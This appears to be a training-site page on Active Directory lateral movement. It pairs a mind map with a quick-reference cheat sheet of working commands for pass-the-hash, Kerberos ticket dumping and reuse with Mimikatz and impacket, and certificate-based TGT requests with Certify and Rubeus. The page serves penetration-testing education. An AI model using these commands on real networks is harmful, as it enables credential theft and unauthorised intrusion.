Dashboard > Mind Maps > Ticket & Certificate Attacks

Ticket & Certificate Attacks

Lateral movement with Kerberos and Certificates

Pass the Ticket & Pass the Certificate

Tip: Click on any node to see related information!

MAP Interactive Mind Map

graph TD A[Compromise] --> B{Artifact} B --> C[Kerberos Ticket] B --> D[Certificate] C --> E[Pass the Ticket] D --> F[Pass the Cert] E --> G[Inject to Session] F --> H[Request TGT] H --> E G --> I[Access Service] I --> J[Lateral Move]

MODULES Related Modules

Pass the Ticket & Pass the Certificate

Lateral movement using Kerberos tickets and certificates....

Active Directory

REF Quick Reference

Pass the Hash

# Windows
mimikatz: sekurlsa::pth /user:admin /domain:corp /ntlm:HASH # PTH with Mimikatz
# Linux
impacket-psexec -hashes :HASH user@target # PTH with PsExec
evil-winrm -i target -u user -H HASH # PTH with Evil-WinRM

Pass the Ticket

# Export ticket
mimikatz: sekurlsa::tickets /export # Dump tickets from memory
# Use ticket
export KRB5CCNAME=ticket.ccache # Set ticket env var
impacket-psexec -k -no-pass user@target # Auth using Kerberos ticket

Pass the Certificate

# Request cert with Certify
Certify.exe request /ca:CA-SERVER /template:User # Request certificate
# Convert to PFX
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx # Convert PEM to PFX
# Use with Rubeus
Rubeus.exe asktgt /user:admin /certificate:cert.pfx /ptt # Request TGT using cert and Pass-the-Ticket
Back to Mind Maps View Full Module